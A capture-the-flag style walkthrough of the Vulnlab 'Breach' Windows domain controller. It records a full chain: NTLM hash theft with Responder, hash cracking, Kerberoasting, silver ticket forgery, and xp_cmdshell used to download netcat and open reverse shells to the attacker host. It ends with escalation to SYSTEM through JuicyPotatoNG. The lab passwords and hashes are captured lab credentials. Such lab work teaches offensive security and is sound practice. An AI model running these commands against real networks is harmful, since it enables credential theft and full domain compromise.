vulnlab breach
a Medium Windows machine
tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe
.
we create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/Greenwolf/ntlm_theft
python ntlm_theft.py -g all -s 10.10.97.69 -f puckie
.
┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.2.138]
Responder IPv6 [fe80::e718:d192:5032:1452]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-88BT76XF41N]
Responder Domain Name [FBHG.LOCAL]
Responder DCE-RPC Port [49865]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong
.
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt
as Julia.Wong
┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
KERB_VALIDATION_INFO
LogonTime:
dwLowDateTime: 2560514102
dwHighDateTime: 30942228
LogoffTime:
--snip--
Domain SID: S-1-5-21-2330692793-3312915120-706255856
0000 10 00 00 00 F5 18 12 7A 3C 36 13 6A 18 C4 BD 3F .......z<6.j...?
┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 05:43:08.106169 2024-06-07 05:23:44.260778
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$a6211db7cc5fb5d31bc2338c501b4b7e990dc8cee0c416b2c0d89de679cc95a7ab289f018a43a37c113e2d99b058d51b50ab4fc5c10b3dc54451444f0e129b435d4d7a7302feb22e19e6983fa6493c83ce6910341a4f1e2b6404565a2f272b09b1511faead8cd5e2bfb82ca51b20b8170147af1aa262b62c95f32b8f5e43cedd5a9e76239d33f87be790624c2a2077cf7b2f5a2aecd3d6e9105321a4d150ea3ffbfb4ee7e4a4c9cf45a056ff7df8f6732f08f45d4c5bcfa4f747078ad5ffa29ac4a68950379570e53ddead20f5320635f2b111f39c81e655086451a078db3a0a3159fe2a4289a57ddde3e65b04b3d2942a3d79a95c8a0dca50c5cfe93e52610256c4a069ba51318584e7d0ccbaee4bfeffce4f9aff6b415276f5ee88ebe9623ebeefaf73da42b5239b3fd1b62fa581556d427ec512df3798042a17e062eea1d676be04735fda3d0043705d4f1f9ca87612230b42cad9bfd867f58cba6c26c06332dde93c81f29ddc039ec5a35269a1f003148fac2ffca4a3f7f2b316fcd59401c9b68cabd231aeebb08f41800c9ab7811562eca1c23ac4def78e18af008ce98e8351f1d3afb437f2f325d645e5bfc7177184018cc00e0fed69c375a91887d02e0f4f1e7a025164431f28a922494acca4b4e36d3d6684e7137879d692117b01bd7c27adff6783e887c06a8841f3a8148fbf419805d967a1716693370d5b442bce99756c58bdcdff1f4be584b525cddf4bba0c0e9f82e0f92199b30854306036db6ff868eb5bfe186b30de5afd07837977f3aa462dff42ad1ce63fa743fdbcc267ad45d65adbdd3e30d9f310860a987cbb1aea8ef9eab1f5752a9a3e686c1d3d503fc006e5df3a49c53d2ab3c45e80f78cd5eba2a72530966e1d15d097fb2700150e3eabb451d3cebf1c7abbcc06c02ef06757f59ec2038761610cd6b25ea83ae019f3805fc31ae3cbd9ea9ed193f622b175f2fe2e737e6fed9be29d31f4947a4ec24be9a9f79af713f991ae842010a7079821e76af8ced756f1e2c83370d1940ec99fff26394e01d17cadef7551b053d7b998ca62c1f1f83cd9a3aa6db9eb6dde4a68fe19f2ac49d3efc4f93bebf3f62cf41fa1d1f5c01fa0978a4c1f7c4774482bb4469b00cd59f782ffef40e09cff227614e6c5a807322302be2cc0f4f28492d95a724b561a21884ac94066d8fe8a82ebdf8a51a590b2635a3be34c00170d55815fa286ccdf8ed7c04c0914090ed7e9a39666d5d6533f6b20846b8a398706ec251064d76960f7af521f9a77439585bb2ba2f6397b7bacbdb1ac81bdcd2ee6bbf3c3005923890c538d9c7ba3ccca2984901ed7a696e02a8e1ab6e64aef3f487f1cf118c3714085ac652f9f202e747b501eaa981644639d59bed8d9891fdc407a23faf797239454d948d5290376271e091621b11bd16ee5ecb5cdd80d73a5bf2fdbd60b739c265fd8a4b22e606b86865f3ebffa9c
Getting more users
┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
cat domain_users.grep | grep svc
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115
bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69
Silver ticket create with the NTLM hash of the svc_mysql user:
In order to perform a silver ticket attack we require the Domain SID , User NTLM hash & User SPN
┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c
impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache
.
┌──(puck㉿kali)-[~/vulnlab/breach] impacket-mssqlclient -k breachdc.breach.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (BREACH\Administrator dbo@master)>
.
SQL stuff
SQL (BREACH\Administrator dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE
SQL (BREACH\Administrator dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE
SQL (BREACH\Administrator dbo@master)> xp_cmdshell dir "C:\"
output
----------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is B465-02B6
NULL
Directory of C:\
NULL
08/19/2021 06:24 AM <DIR> EFI
02/17/2022 09:55 AM <DIR> inetpub
05/08/2021 08:20 AM <DIR> PerfLogs
02/17/2022 10:28 AM <DIR> Program Files
02/17/2022 10:27 AM <DIR> Program Files (x86)
02/17/2022 02:11 PM <DIR> share
02/17/2022 01:12 PM <DIR> Users
02/17/2022 03:35 PM <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 11,722,678,272 bytes free
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output
------
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell dir "C:\Temp"
output
--------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is B465-02B6
NULL
Directory of C:\Temp
NULL
06/07/2024 10:34 AM <DIR> .
06/07/2024 10:34 AM 45,272 nc64.exe
1 File(s) 45,272 bytes
1 Dir(s) 11,754,811,392 bytes free
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"
.
Privesc with JuicyPotatoNG
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
breach\svc_mssql
C:\Windows\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
C:\Windows\system32>cd c:\temp
cd c:\temp
c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 11:08 AM 153600 JuicyPotatoNG.exe
-a---- 6/7/2024 10:34 AM 45272 nc64.exe
PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>
.
┌──(puck㉿kali)-[~/vulnlab/breach] rlwrap nc -nlvp 445 listening on [any] 445 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454 Microsoft Windows [Version 10.0.20348.558] (c) Microsoft Corporation. All rights reserved. C:\>whoami whoami nt authority\system c:\Users\Administrator\Desktop>hostname hostname BREACHDC
.